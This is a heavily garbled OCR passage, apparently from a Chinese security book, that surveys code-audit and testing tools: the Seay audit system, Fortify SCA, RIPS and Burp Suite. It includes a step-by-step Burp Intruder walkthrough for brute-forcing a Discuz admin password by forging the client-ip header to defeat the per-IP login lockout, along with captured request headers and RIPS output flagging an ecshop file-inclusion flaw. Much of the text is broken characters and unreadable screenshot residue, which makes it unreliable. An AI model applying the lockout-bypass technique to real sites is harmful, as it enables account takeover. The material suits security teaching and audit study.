Seay 源 代码 审计 系统 主要 特点 如 下 : 
1) 一 键 自动 化 白 盒 审计 ， 新 建 项 目 后 ， 在 菜单 栏 中 打开 “自动 审计 ” 即 可 看 到 自动 审计 界面 。 点 击 “ 开 始 ” 按 钮 即 可 开始 自动 化 审计 。 当 发 现 可 疑 漏洞 后 ， 则 会 在 下 方 列表 框 显示 漏洞 信息 ， 双 击 漏 洞 
项 即 可 打开 文件 跳 转 到 漏洞 代码 行 并 高 亮 显 示 漏洞 代码 行 ， 如 图 2-10 所 示 。 
Ti Seay 源 代码 审计 系统 -号 | =). 
: ue SEINE x 关闭 项 目 a 自动 审计 总 全 局 搜索 及 审计 插件 S 代码 调式 ”月 函数 查询 让: 数据 管理 EMA d 临时 记录 2 Sos - GXTEÓ- 
ta 文 件 结构 。 编码 : VIF-8  ~ 词 司 : 翻译 : 


E ui ecshop 自动 审计 
(i activity. php j 
| UB affiche php 
[lM affiliate. pho = 
-IB alipay. htnl SE XH mE 
SE See Ti BAHA TETE, WES jactivity. php require_once (ROOT_PATH . ‘1... 
e SaL 语 句 select 中 条 件 变量 无 单 引号 悍 护 ， 可 能 存在 s9L 注 久 漏 同 affiche. php $sql = “SELECT goods name F... 
站 史 L 语 名 select 中 条 件 变量 无 单 引号 保护 ， 可 能 存在 SI 注 久 漏 同 farticle. php Sprev_article = $di-^getRow... 
(UU article_cat. php HEINI. HTTP REFERERR[[UEE: TEÜQS[DESQL..  fowehonge. php $back act = cirpoc(PGLOBALS... 
: a E SHITE Aste cs, HITP_REFERERA| (E> HMS|ESGL... — Jexchange.php if (lisset back act) &À is... 
MES os 立 件 也 言 国 数 中 存在 变 里 , EASA j£low php include ence( includes/nodu... 
j DA captcha php SPE III. DEES {flow. php include_once (languages. ... 
"o E TPA REELS, BELEN ES LIT EN : require once (ROOT PATH "1... 
i UB category. php SLAT elet HERAA S BR HSOLS ATR] flow. php $sql = “SELECT COUNT (*) FRO... 
don e NN SLA Aseli R ETA H AETLI JEE Elow php $sql="SELECT shipping id FR... 
M E e SOLD Alsclect R TEAR EH PAETAE feood: php 生成 报告 Gnext_gid = $lb- estOne (SE... 
c" o G SaL 语 名 selsct 中 条 件 变量 无 单 引号 保护 ， 可 能 存在 s9L 注 入 漏 同 goods. php diim Sprev gii = $db->getOne "SE... 
pol compere. php phpinfo OBI HIBETETEBRERE EU SERES [goods script "o Pant phpinfo ;exit(); 
a 文件 包含 函 考 中 存在 讼 量 , 可 能 存在 文件 包含 时 洞 Hueco E E include inte (plugin): 
Woo al XfEESERSU THESES, TEAS jmyship. pho require ence (ROOT_PATH , ' 
Meo 立 件 包含 国 寺中 存在 变量 , ire ARN Ipackage. php require ence (EOT_PATH , ' 
[aM feed ply SRA HATES, ELAS RA package. php require_once QOOT_PATH . OC 
=_ > THHARAhGESS, AES ee respond. php include cce (plugin file); 
- o s YrHE(FHU HEEE EESHA  /sitenaps. chr file put contents (HDOT PATH... 
«ooo TRSA h EEE, 可 能 存在 文件 包含 漏洞 juser. php include ence (plugin): 
CWl eeods_seript. php 文件 包含 函数 中 存在 变量 , TTS Juser. php include once (ROOT PATH ‘i... 
Mogg 文件 包含 国 数 中 存在 变量 , 可 能 存在 文件 包含 漏洞 fuser. php include_once (HOOT_PATH | ‘1... 
HM c os TAHA T trt RES TSR Juzer. php require snce(MDDT PATH | “1... 
: UB index. pip EIRIAS fies: HITP_REFERERP TAE: TEUS[ASSQL... fuser. php Fback act = strpos (PGLOBALS... 
| = message php 5 EEA EAEE GHE. HIF REFEREREDE. EME ESL... fuser. php if ((lisset (hback_act) || em... 
peg wyship. php SSRITFHU sto thE. HTTP REFERERG| (HE, SEMLS[ESOL... fuser php if lempty(fback act) BR iss... 
[ull package. php 蔡 取 IF 抽 址 方式 可 均 造 ，HTTF_REFERERH 协 造 ， 常 见 引 发 39L.. fuser. php i£ ((lissetüfback act) |lemp... 
MB Pisout php THESES. EISGRNRPDECTSHEHENEMRRÁE 0 user php üwlinkíRODT PATH — DATA DT. 
EA po Php TEHRHEEA REEE. AELEZRA... — adnin/adz php Gunlink (HOOT_PATH. DATA DIR... 
WB quotation. php TP RAMP REE, TESA i sdniaf adsense. php require ence (MODT JATH , “1... 
: DA receive. php eit rhe Tse stn Ee S AEE MP THES ES vaaniva anan PNOT PATH "1 
a — :|e — 4o FARE: Do\wewecshopadninkineludes\init. php 











图 2-10 


2) 代码 调试 ， 代 码 调试 功能 极 大 地 方便 了 审计 师 在 审计 过 程 中 测试 代码 。 可 以 在 编辑 器 中 选中 代码 ， 然 后 点 击 右键 选择 “调试 选中 ” 即 可 将 代码 在 调试 界面 打开 ， 如 图 2-11 所 示 。 


3) 正则 编码 ，Seay 源 代码 审计 系统 集成 了 实时 正则 调试 功能 ， 考 虑 到 特殊 字符 无 法 直接 在 编辑 框 进行 输入 ， 在 实时 正则 调试 功能 中 还 支持 对 字符 串 实时 解码 后 调试 。 另 外 ， 支 持 MD5、URI、 
Base64、Hex、ASClII、Unicode 等 多 种 编码 解码 转换 功能 ， 如 图 2-12 所 示 。 


4) 自 定义 插件 及 规则 ，Seay 源 代码 审计 系统 支持 揪 件 扩展 ， 并 且 插 件 的 开发 非常 简单 ， 只 需要 将 插件 的 dl 文件 放 入 到 安装 目录 下 的 plugins 文 件 夹 内 即 可 自动 加 载 揪 件 。 目 前 自 带 插件 包括 黑 盒 + 白 盒 
的 信息 泄露 审计 以 及 MySQL 数 据 库 执行 监控 。 


"iE 各 临时 记录 


D£p 文件 结构 BB: GRE ë ~v 


E EB ecshop 
- M activity. php 
"EE affiliate. php i i 
E alipay. html : phpinfo (); 
= | animated favicon| | | 
M iss 
El article. php 
| article cat. php 
ra auction php 


- i- ipta: php 
ru catalog php 
na category. php 
LM certi. php 
- “QB chinabank receiv 
[ill comment. php 
| E compare. php 
LEE cycle image. php 
; "du exchange. php IPH Version => 5.2.1 
= B favicon ico 
System => Windows NT PC20140T182221 6.1 build T601 
[Build Date => Feb 7 2007 23:10:31 
[Configure Command => cscript /nologo configure. js  "—-enable-znapshot-build" "——with-gd-szhared" 
(Server APT => Command Line Interface 
[Virtual Directory Support => enabled 
Configuration File (php.ini) Path => C:\Windows 
PHP API => 20041225 
[PHP Extension => 20060613 
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== Seay 源 代码 市 计 素 统 Fe eee» 9 
| ME 新 建 项 目 XO 关闭 项 目 jw 自动 审计 全 局 按 索 P 审计 插件 ， 代码 调试 OE S 数据 管理 VIERNES 图 临时 记录 G 系统 配置 > 
D 文件 结构 IRG: WIF-8 ~ iB): ini : 


VER OFTHE © LES © Baseg4 解 码 Okk 常用 正则 : LR 
ARX 


RANE F 








E 242 
除了 上 述 功能 外 ， 它 还 支持 自 定义 审计 规则 ， 在 规则 配置 界面 中 即 可 添加 或 修改 以 及 禁用 、 删 除 规则 ， 还 可 针对 审计 过 程 做 很 多 审计 习惯 优化 ， 使 得 程序 简单 容易 上 手 。 
2.2.2 Fortify SCA 


Fortify SCA 是 由 惠普 研发 的 一 款 商 业 软 件 产品 ， 针 对 源 代码 进行 专业 的 白 盒 安全 审计 ， 当 然 ， 它 是 收费 的 ， 而 且 这 种 商业 软件 一 般 都 价格 不 菲 。 它 有 Windows、Linux、UNIX 以 及 Mac 版 本 ， 通 过 内 
置 的 五 大 主要 分 析 引 警 (数据 流 、 控 制 流 、 语 义 、 结 构 以 及 配置 ) 对 应 用 软件 的 源 代码 进行 静态 分 析 。 关 于 这 五 大 分 析 引 警 的 介绍 如 表 2-1 所 示 。 


表 2-1 五 大 分 析 引 擎 概述 


分 析 R fa 述 


数据 流 分 析 需 可 以 检测 涉及 将 被 感染 数据 【用 户 控 制 的 输入 ) 用 于 危险 用 途 的 汪 在 漏洞 。 数 据 流 
di: 用 全 局 的 、 程 序 间 的 感染 警 殖 分 析 ， 检 测 source (用 户 输 入 的 ^ 点 ) 与 sink (fiy AY PR BY 
数据 流 Hs 7 fe TE) 之 间 的 数 气流。 例如， 数据 流 分 析 器 可 以 检测 一 个 用 户 控 sii 别 长 的 字符 串 输 


yee + 下 被 复制 到 一 个 固定 长 度 的 缓冲 区 中 ， 还 可 以 检测 一 个 用 户 控制 的 字符 串 是 否 正 被 用 来 构 
建 SQL 查询 文本 


控制 流 分 析 器 可 以 检测 潜在 的 危险 操作 的 执行 顺序 。 通 过 分 析 程 序 中 的 控制 流 路 径 ， 控 制 流 分 
控制 流 — | 析 着 能 确定 在 执行 一 系列 操作 时 是 ART 特定 的 顺序 。 P An, fim prn] A Keil check/time 
的 时 间 和 未 经 初始 化 的 变量 ， 并 检查 实用 程序 ， 如 XML Die. ab AE A S AE FY BIO TEE 


语义 分 析 屁 可 以 在 程序 内 部 层面 检测 可 能 会 引发 潜在 危险 的 函数 和 API 的 各 种 使 用 情况 。 其 特 
定 的 逻辑 会 搜索 buffer overflow , format string TT rete 的 问题 ， 但 并 不 局 限于 这 几 个 类 别 ， 





ii. là y e i : ud 
i 任何 存在 潜在 危险 的 函数 调用 都 可 以 通过 语义 分 析 器 进行 标记 。 例 如 ,语义 分 析 吕 可 以 检测 Java 
A AN et AT RRT C/C++ 中 的 不 安全 胃 数 ， 如 gets() 
结构 分 SUME dof lr ers 在 和 危险 的 结构 缺陷 或 程序 定义 。 通 过 理解 程序 构建 的 方式 ， 结 构 分 
结构 析 带 能 够 识 别 出 以 其 但 方式 难 以 ree 到 的 问题 ， 原 因 是 这 些 技术 涉及 的 范围 很 广 ， 包 括 有 关 声 明 
TI AE fit BR 4 rece Bul. Ar ae he ill FE Java Servlet 中 成 员 变 量 的 峰值， 识别 未 被 再 明 为 
static final 的 记录 着 的 使 用 ， 并 标记 那些 由 于 断言 为 始终 稍 误 而 水 不 被 执行 的 dead code 实例 
"n Hi Bir Wr si AY ELTE HI CE ee R, AREE RUE oU Bg Sed]. fau. BOTE 
El. 


分 析 器 可 检查 网 络 应 用 程序 的 某 一 用 户 会 话 的 超时 是 否 合理 


Fortify SCA 是 目前 支持 最 多 编程 语言 的 审计 软件 。 它 支持 的 编程 语言 如 下 所 示 : 
ASP.NET 

VB6 

VB.NET 

Java 

C#.NET 

JSP 

ASP 

JavaScript 
VBScript 

HTML 

Action Script 
XML 

Objective-C 
C/o 
ColdFusion 5.0 
PHP 

Python 

T-SQL (MSSQL) 
COBOL 

PL/SQL (Oracle) 
SAP-ABAP 


分 析 的 过 程 中 与 它 特有 的 软件 安全 漏洞 规则 集 进行 全 面 的 匹配 、 搜 索 ， 在 最 终 的 漏洞 结果 中 ， 包 括 详细 的 漏洞 信息 ， 以 及 漏洞 相关 的 安全 知识 说 明和 修复 意见 


2.2.3 RIPS 


RIPS 是 一 款 基于 PHP 开 发 的 针对 PHP 代 码 安 全 审计 的 软件 。 另 外 ， 它 也 是 一 款 开源 软件 ， 由 国外 安全 研究 员 Johannes Dahse 开 发 ， 程 序 只 有 450KB， 目 前 能 下 载 到 的 最 新 版 是 0.54， 笔 者 发 现 这 款 程 
序 在 2013 年 2 月 已 经 暂停 更 新 。 在 写 这 段 文字 之 前 笔者 特意 读 过 它 的 源码 ， 它 最 大 的 亮点 在 于 调用 了 PHP 内 置 解析 器 接口 token_get_all， 并 且 使 用 Parser 做 了 语法 分 析 ， 实 现 了 跨 文 件 的 变量 及 函数 追踪 ， 


扫描 结果 中 非常 直观 地 展示 了 漏洞 形成 及 变量 传递 过 程 ， 误 报 率 非常 低 。RIPS 能 够 发 现 SQL 注 入 、XSS 跨 站 、 文 件 包含 、 代 码 执 行 、 文 件 读 取 等 多 种 漏洞 ， 支 持 多 种 样式 的 代码 高 亮 。 比 较 有 意思 的 是 ， 它 
还 支持 自动 生成 漏洞 利用 。 


图 2-13 为 RIPS 截 图 。 


ml ha I. user tainted only + A All server-side scan 


"TE Bo 3c: R ps 
code stye: e -M—NT CA ë — EF | 


Quickstart: 


Locate your local PHP source code path/file (e.g. /vanwnworojectt/ or ranivwawindex. php), choose the vulnerability type you are looking for and click scan! 
check subdirs to include all subdirectories inta the scan. Iis recommended to scan only the rool directory of your project. Files in subdirectories will be 
automatically scanned by RIPS when included by the PHP code. However enabling subdirs can improve the stan result and the include success rate (shown In the 
result). 


Advanced: 


Debug errors ar improve your stan result by choosing a different verbosity level (default level 1 is recommended). 

After tne scan finished 4 new button will appear in the upper right. You can select between different types of vulnerabilities that nave been found by clicking on thai 
name in the stats window You can click user input in the upper right to get a list of entry points, functions for a list and graph of all user defined functions or file 
for a list and graph of all scanned files and thelr includes. All lists are referenced to the Code Viewer 


Style: 


Change the syntax highlighting schema on-the-fly by selecting a different code style 
Before scanning you can choose which way the code flow should be displayed: bottom-up or top-down 


Icons: 


User input has been found in this line. Potential entry point for vulnerability exploitation. 
vulnerability exploitation depends on the parameters passed to the function declared in this line. Have a look at the calls in the scan result. 
Click © or Uy to jump to the next declaration or call of this function. 

* User-implemented securing has been detected in this line. This may prevent exploitation. 


Options: 


È Click the file icon to open the Code Viewer to review the original code A new window will be opened with all relevant lines highlighted 

Highlight variables temporarily by mouseover or persistently by clicking on the variable. Jump into the code of a user-defined function by clicking on the call 
Click retum on the bottom of the code viewer to jump back. This also works for nested function calls 

= Click the minimize icon to hide a specific code trace. You may display il later by clicking the icon again. 

3! Click the target icon to open the Exploit Creator A new window will open where you can enter exploit details and create PHP Curl exploit code 

$ Click the help icon to get a description, example code, example exploitation, patch and related securing functions for this vulnerability type 

= Glick the data leak icon to check if the output of the tainted sink leaks somewhere (is embedded to the HTTP response via echo/print) 
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RIPs 的 使 用 非常 简单 ， 只 需 在 主 界面 填 入 我 们 要 扫描 的 路 径 ， 其 余 配置 可 根据 自己 的 需要 设置 。 完 成 设置 后 点 击 scan 按 钮 即 可 开始 自动 审计 。 扫 描 结束 后 ， 程 序 会 显示 漏洞 数量 、 漏 洞 比例 等 信息 。 碍 
看 漏洞 详情 时 ， 只 需 点 击 提示 漏洞 处 的 “-” 即 可 显示 漏洞 源 代码 和 变量 过 程 ， 如 图 2-14 所 示 。 


笔者 通过 RIPS 发 现 ecshop 文 件 包 含 漏洞 ， 图 2-15 所 示 为 RIPS 漏 洞 扫 描 详细 结果 。 


代码 查看 也 非常 方便 ， 只 需要 点 击 “review code” 即 可 跳 转 到 漏洞 代码 处 ， 将 鼠标 指针 悬浮 在 变量 上 ， 同 文件 的 变量 会 高 亮 显示 ， 如 图 2-16 所 示 。 


RIFS - A static source code anal... | + 


fo e localhost! ips Ū, 5, 24 f 


path / file: 
verbosity level: 


code style: 


File: D:\wwwiecshopladmin/account log.p 


国 Unserialize 


File: D:\wwwiecshop\iadmin/auction. 


E Unseralize 


File: Dwwwiecsho 


m Filo Disclosure 


= File Manipulation 


File: D:\wwwiecshopladmin/goods.p 
El Cross-Site Scripting 


国 File Manipulation 


File: D: 


E File Inclusion 
Eu 
ee 


UseETlTDUurt reaches semairive Fink. 


B1: include once include once (ROOT PATH . “includes/modules/integrates‘’™ . $ GET["code"] 


D rb + Ê 


Fi subdirs windows 
8  — ar 


regex 


ae files 


atats 


user input 


functions 
hp | 
Result 


Code Execution 
File Disclosure: 


File Inclusion: 

File Manipulation 
Cross-Site Scripting: 
Splitting: 


HTTP Response 
unsenalze 
Sum: 


104 
416/20TT7 (20%) 


[au] 7 


=i 


Scanned files: 

Include success. 
Considered sinks: 
User-defined functions: 


ry 
Pal 


"EE: 
a130 


Unique sources 


Sensitive sinks: 


info: 


Info: phpinfo) detected 


Stan time 30.844 Seconds 
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. php}: 


61: definc(*ROOT PATH", atr rcpincc(ADMIN PATH . 


59: definc['ADMIN PATE', 
27: define['ADMINM PATE’, 


"emi" fz 
"adm:m']: 


# 96: £ CET 一 nddslnshes deep [$ GET); 


a 
al 


if ($ REQUEST['act'] 
7A: ifi& GET['code'] == 


== 'inatall"} 
'ecshop') else 





图 2-15 








shop\admin\integrate.php 


else 
i 
$sql = "UPDATE " . SGLOBALS[ecs']-=table(‘users’) . 
" SET flag = 0, alias="". 
" WHERE flag > 0"; 
$db-»query($s4|); 
Sset modules - true; 
include once(ROOT PATH."includes/modules/integrates/" $ GET [code"." php") 
$set modules = false; 


$cfg = $modules[O][ default']; 











图 2-16 





不 管 是 借助 代码 审计 工具 还 是 读 PHP 文 件 发 现 的 漏洞 ， 我 们 都 需要 验证 漏洞 是 否 真实 可 用 。 这 就 需要 借助 一 些 工 具 来 帮助 我 们 快速 测试 漏洞 ， 或 者 在 某 些 情况 下 ， 比 如 部 分 代码 不 可 读 时 ， 我 们 可 以 在 
不 继续 往 下 读 代 码 的 情况 下 测试 漏洞 ， 做 基于 模糊 测试 的 漏洞 验证 。 主 要 的 辅助 工具 分 为 数据 包 请 求 工具 类 、 暴 力 枚 举 类 、 编 码 转 换 及 加 解密 类 。 当 然 ， 还 有 一 些 正则 调试 和 SQL 执行 监控 等 软件 。 下 面 只 
列举 一 些 常用 的 ， 根 据 不 同 的 漏洞 和 环境 需要 措 配 不 同 的 工具 来 测试 。 


2.3.1 Burp Suite 


Burp Suite 是 一 款 基 于 Java 语 言 开 发 的 安全 测试 工具 ， 使 用 它 需 要 安装 Java 运 行 环 境 。 这 款 软件 只 有 不 到 10MB 的 大 小 ， 但 是 其 强大 的 功能 受到 几乎 所 有 安全 人 员 的 青睐 。Burp Suite 主 要 分 为 Proxy、 
Spider、Scanner、lntruder、Repeater、Sequencer、Decoder 和 Comparer 几 个 大 模块 。 下 面 简单 介绍 下 各 个 模块 : 


: Proxy (代理 ) Burp Suite 的 代理 抓 包 功能 是 这 款 软 件 的 核心 功能 ， 当 然 也 是 使 用 最 多 的 功能 。 使 用 这 个 代理 ， 可 以 截获 并 修改 从 客户 端 到 Web 服 务 器 的 HTTP/HTTPS 数 据 包 。 
: Spider (Hoek) 用 来 分 析 网 站 目录 结构 ， 扑 行 速度 非常 不 错 ， 扑 行 结 果 会 显示 在 Target 模 块 中 ， 支 持 自 定义 登录 表单 ， 让 它 自 动 提交 数据 包 进 行 登录 验证 。 
- Scanner (扫描 器 ) 用 于 发 现 Web 程 序 漏洞 ， 它 能 扫描 出 SQL 注入 、XSS 跨 站 、 文 件 包 含 、HTTP 头 注入 、 源 码 泄露 等 多 种 漏洞 。 


‘Intruder (入 侵 ) 用 来 进行 暴力 破解 和 模糊 测试 。 它 最 强大 的 地 方 在 于 高 度 兼 容 的 自 定 义 测 试用 例 ， 通 过 Proxy 功 能 抓 取 的 数据 包 可 以 直接 发 送 到 Intruderf， 设 置 好 测试 参数 和 字典 、 线 程 等 ， 即 可 开始 
漏洞 测试 。 


: Repeater (中 继 器 ) 用 于 数据 修改 测试 ， 通 常 在 测试 一 些 像 支付 等 逻辑 漏洞 的 时 候 经 常 需要 用 到 它 ， 只 需要 设置 好 代理 拦截 数据 包 ， 然 后 发 送 到 Repeater 模 块 即 可 对 数据 随意 修改 之 后 再 发 送 。 

' Sequencer (A) 用 于 统计 、 分 析 会 话 中 随机 字符 串 的 出 现 概率 ， 从 而 分 析 Session、Token 等 存在 的 安全 风险 。 

: Decoder (解码 ) 用 于 对 字符 串 进 行 编码 和 解码 ， 支 持 百 分 号 、Base64、ASCII 等 多 种 编码 转换 ， 还 支持 Md5、sha 等 Hash 算 法 。 

: Comparer (比较 器 ) 用 于 比较 两 个 对 象 之 间 的 差异 性 ， 支 持 text 和 hex 形 式 的 对 比 ， 通 常用 来 比较 两 个 feduest 或 者 fesponse 数 据 包 之 间 不 同 的 地 方 ， 功 能 类 似 于 网 上 常见 的 文本 或 者 文件 对 比 软件 。 


以 上 是 Burp Suite 的 几乎 所 有 功能 。 当 然 ， 不 同 的 使 用 者 有 不 同 的 需求 ， 很 少 会 用 到 上 面 介绍 的 所 有 功能 。 笔 者 再 详细 介绍 一 下 常用 的 几 个 功能 。 


这 是 使 用 最 多 的 功能 ， 因 为 其 他 的 几 个 常用 功能 也 依赖 于 代理 功能 抓 到 的 数据 包 ，。 


它 的 使 用 非常 简单 ， 打 开 Burp Suite 后 ， 点 击 菜单 栏 的 Proxy 即 可 看 到 Proxy 功 能 界面 。 首 先 需要 设置 监听 IP 和 端口 ， 在 Proxy Listeners 区 域 选中 代理 项 ， 然 后 点 击 左边 的 Edit 按 钮 。 它 有 三 种 监听 模 
式 ， 如 图 2-17 所 示 。 


如 果 你 只 需要 监听 本 地 的 数据 ， 绑 定 地 址 的 地 方 设 置 Loopback only 即 可 。 如 果 需 要 监听 到 本 机 的 所 有 HTTPSVHTTP 流 量 ， 则 选中 All interfaces。 默 认 监 听 8080 端 口 ， 在 这 里 可 以 自行 修改 ， 点 击 OK 
按钮 完成 设置 。 


接 下 来 的 设置 要 在 需要 被 代理 的 客户 端 完成 。 这 里 的 设置 如 图 2-18 所 示 。 


由 于 这 里 要 监听 本 地 浏览 器 的 数据 ， 所 以 设置 代理 服务 器 地 址 为 127.0.0.1， 端 口 为 8080， 也 就 是 Burp Suite 中 之 前 设置 的 监听 端口 。 











Ẹ Edit proxy listener 











These settings control how Burp binds the proxy listener. 


Bind to port: 9050 


Bind to address: @ Loopback only 

© All interfaces 

© Specific address: i 
127.0.0.1 
192.168.199.144 
192.168.199.44 
192.168.213.1 
192.168.83.1 
0:0:0:0:0:0:0:1 
fe50:0:0:0:0:5efe:c0a8:58019618 
fe80:0:0:0:0:5efe:c0a8:c 72c9617 





图 2-17 


HTTP 代理 : (X) 127.001 


为 有 所 有 协议 使 用 相同 代理 (5) 
sem. D: [eoa 
ETP OR Es WD : [ soso 











图 2-18 
现在 就 可 以 开始 抓 包 测试 了 。 如 图 2-19 所 示 ， 已 经 可 以 成 功 抓 到 浏览 器 的 Request 和 Response 数 据 。 
2.Intruder 功 能 


该 功能 主要 用 于 模糊 测试 。 在 模糊 测试 分 类 里 ， 用 得 最 多 的 是 暴力 破解 登录 用 户 密码 ， 笔 者 非常 喜欢 这 个 功能 ， 因 为 它 有 非常 强大 的 兼容 性 来 支持 各 种 数据 格式 爆破 。 下 面 让 我 们 来 见识 下 Intruder 到 
底 是 有 多 强大 。 这 里 演示 用 它 来 爆破 Discuz 后 台 登 录 密 码 。 注 意 ，Discuz 登 录 是 有 登录 验证 限制 的 ， 每 个 IP 只 有 5 次 登录 失败 的 尝试 机 会 。 我 们 利用 Burp Suite 绕 过 这 个 登录 限制 进行 密码 爆破 ， 绕 过 原理 
是 ， 由 于 Discuz 采 用 的 是 HTTP_CLIENT_IP 的 方式 来 获取 IP， 而 这 个 值 可 以 在 发 送 请 求 时 伪造 ， 于 是 我 们 可 以 利用 Burp Suite 来 伪造 这 个 登录 IP 绕 过 错误 次 数 限 制 。 


EE eom 


INT =| Œ ® SOL: XSS- Encryption Encoding: 
Load URL 
b Split URL 


Execute bi 


| 
[a Erbe Post data 回 Enable Bener | Filter: Hiding CSS, image and general binary content 


C] 用 最 简单 的 方法 最 高 效 的 达到 目的 # a Host | Method | URL ited Status Len 
(451 — http//enseay com CET 1 BDB p 3M a 

152  http.//www.cnseay.com GET | 200 TH 

154 http //wurw happyboy neten GFT idownload asp?id=a0 3n? Rat 

156 . http//widget weibo.com GET /weiboshow/index. php?language... 200 721 

» W WW. cnseay C O T 158  http//c.cnzz.com GET /care.php?web 1d24318211&sho... 200 994 


“ee ; 133 http-//wvww.cnseay.com GET i /2/ 200 710 
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= SET / HITF/T. 1 


| (FS: seay Hest: www. enseay. com 
User-Agent: a 

STHEN 

e is e Accept: text/html, application/xhtnltenl, applicatiern/xnl;q-0.89,*/*,q-0,.8 
43 SSIES AHi ll Accept- -Language: zh-cn, zh;q-0.8,en-us;q-0.5,en;q-ü. 3 
tx. DBwebs X Accept-Encoding: gzip, deflate 

5 puc PHP SESS ID=kkO00tucae20qh6siolsiqrfke56: CHZIDATA4318211-cnzz &eid*$3Dl13321085682-110333'11 62—52] 
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首先 ， 按 上 面 的 介绍 设置 好 代理 抓 包 ， 在 浏览 器 中 打开 Discuz 后 台 登 录 页 面 ， 在 账号 及 密码 输入 框 输入 任意 字符 ， 点 击 “ 提 交 ” 按 钮 ， 回 到 Burp Suite， 将 抓 到 的 数据 项 发 送 到 Intruder。 接 下 来 ， 就 
需要 对 登录 数据 包 进 行 修改 。 


在 Intruder 的 Positions 中 需要 设置 攻击 类 型 为 Pitchfork， 并 且 全 选 数据 包 ， 点 击 Clear$ 按 钮 清除 全 部 标识 。 然 后 在 HTTP 头 中 添加 “client-ip: 1.2.3.4”， 并 且 将 1234 这 个 四 个 数字 单独 打上 $ 标 识 ， 为 
Post 数 据 里 面 的 admin_password 字 有 段 的 值 也 打上 $ 标 识 。 最 后 修改 效果 如 图 2-20 所 示 。 


接 下 来 就 需要 设置 payload 了 ， 点 击 菜单 栏 的 Payloads， 为 Payload set 下 拉 框 里 面 的 第 1、2、3、4 个 选项 设置 一 样 的 Numbers payload， 包 括 其 他 参数 设置 的 最 终 界面 如 图 2-21 所 示 。 


设置 Payload set 为 5 的 Payload type 为 smple list， 并 且 点 击 下 面 的 Load 按 钮 载 入 你 的 密码 字典 ， 然 后 我 们 的 所 有 配置 就 完成 了 。 点 击 菜单 栏 的 “Intruder” 里 的 “Start Attack" 按钮 即 可 开始 爆破 。 
爆破 成 功 的 效果 如 图 2-22 所 示 。 


(2) Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to 
payload positions - see help for full details. 


Attack type: Pitchfork 

















IPOST /discuz/admin.php? HITP/1.1 

|Host: localhost 

lUser-Agent: a 

|Accept: text/html, application/xhtml4^xml, application/xml;q-0, 9, «/*;q-0. 8 

Accept-Language: zh-cn, zh: q=0. 8, en-us: q=0. 5, en; q-0. 3 

|Áccept-Encoding: gzip, deflate 

[Referer: http://localhost/discuz/ admin. php 

Cookie: tjpetrl=1109391910636; lJb5 2132 saltkey-V;1z22QR; 1Jb5 2132 lastvisit-1109388102; 
lIb5 2132 sid-Z6Izvi: 1Jb5 2132 lastact-1109392833*508admin. php&09; iFsr 2132 sid-HhNh88; 
iFsr 2132 saltkey-UYzIZiVV; iFsr 2132 lastwisit-14109389514; iFsr_2132_lastact=1109393119%09admin. php%09 :; 
iFsr 2132 onlineusernum-2 

(Connection: keep-alive 

|Content-Type: application/x-www-form-urlencoded 

Content-Length: 120 

client-ip: IS. 828.8398. F15 


|sid-HhNh8S&frames-yes&admin username-seay&admin password-NSeSy 4 admin questionid-Ü&admin, answer-&submit-XE6N8 
FX90XEIXBAXA: 
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Positions | Payloads 





Payload set: | 1 | Payload count: 999,999 


Payload type: | Numbers ~| Request count: 120 





Payload Options [Numbers] 
This payload type generates numeric payloads within a given range apin a specified format. 


Number range 


Type: (C) Sequential @ Random pee 










From: 




















To: 














Step: 


How many: 


Number format 


Base: 


Min integer digits: d 








Max integer digit 








Min fraction digit 





























Max fraction digits 


Examples 
4 
321 
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Intruder attack 1 


Attack Save Columns 


1071 ‘| 
3177 baseline r | 
3177 | 
3177 
care 
3177 
3177 
J17T 
3177 


Ta d 


12345 
19990708 
19990709 


inan ga nh 


Lj O 
= = 
C] C] 
C) C) 
C] C) 
C 日 
C] - 
C) E 
B H 
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Cookie: tjpctrl-1109394910636; lJb5 2132 saltkey-V!1z22QR; lJb5 2132 lastvisit-1109389102; 1Jb5_2132_sid=Z6Izvi; 
lJb5,. 2132. 1astact-11089392333X$09admin. php&0B8; 1Fsr_ 2132, sid-HhMh88; iFsr, 2132, saltkey-UYz T ZiVV; 

iFsr 2132 lastvisit-1109388511; iFsr 2132 lastact-1109383119*$08admin.php*098; iFsr 2132, onlineusernum-2 
Connection: close 

Content-Type: applicatior/x-www-form-urlencoded 


Content-Length: 122 f — = - 
client-ip: 881. 338. 988. 671 —————— 9 


sid-HhNh88àframes-yeshadmin username-seayBadmin password-z123156&8 admin questionid-Üb&admin answer-&submit-XEGNSFXSONE 
IXSBAXA1 


| ? || £ | + | | > | | Type a search term Ü matches 


| Paused [ELILÁ——————— | 
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3.Repeater 功 能 
这 个 功能 经 常用 于 修改 数据 包 以 及 重 放 请 求 ， 测 试 漏洞 的 时 候 经 常 需要 使 用 到 Repeater。 下 面 来 详细 看 看 它 的 使 用 方法 。 
首先 设置 好 proxy， 然 后 通过 浏览 器 触发 请 求 查看 Burp Suite 捕 捉 到 的 数据 包 ， 在 “http history” 里 选中 监听 到 的 数据 包 项 ， 右 键 发 送 到 Repeater。 接 着 我 们 就 可 以 对 请 求 数据 做 任意 修改 了 ， 修 改 完 
成 后 点 击 Go 按 钮 即 可 发 送 数据 包 ， 如 图 2-23 所 示 。 


2.3.2 ”浏览 器 扩展 


说 到 浏览 器 扩展 ， 肯 定 要 先 说 一 下 浏览 器 。 通 常 优先 选择 的 是 Firefox， 再 就 是 Chrome 浏 览 器 ， 原 因 很 简单 ，Firefox 的 扩展 是 目前 浏览 器 里 面 最 多 的 ， 也 许 是 因为 Firefox 开 源 的 原因 ， 喜 欢 鼓 的 它 的 人 
也 就 多 了 ， 自 然而 然 各 种 插件 和 扩展 也 多 了 。 另 外 不 少 扩展 是 专门 做 安全 测试 使 用 的 ， 常 用 的 像 HackBar、FireBug、Live HTTP Headers、Modify 以 及 Tamper Data， 等 等 ， 稍 后 会 详细 介绍 这 几 款 扩 
展 。 同 时 ，Chrome 浏 览 器 的 扩展 也 非常 多 ， 不 过 方便 用 来 做 安全 测试 的 比 Firefox 少 ， 常 用 的 有 Http Headers、EditThisCookie、ModHeader 等 。 其 次 就 是 一 些 扩展 更 少 的 浏览 器 ， 这 里 就 不 详细 列举 ， 
不 过 建议 常见 内 核 的 浏览 器 都 应 该 安装 一 款 ， 笔 者 电脑 上 就 一 直 装 着 4 款 浏览 器 。 


= c ds Suite Professional v1.6 1.6beta - licensed to to Larrylad — 

















Request Response 


GET T /test/l.php?a-MEBBNS H' php? a- MARRI HTTP/1. 1 1 HTTP/1.1 200 OK 
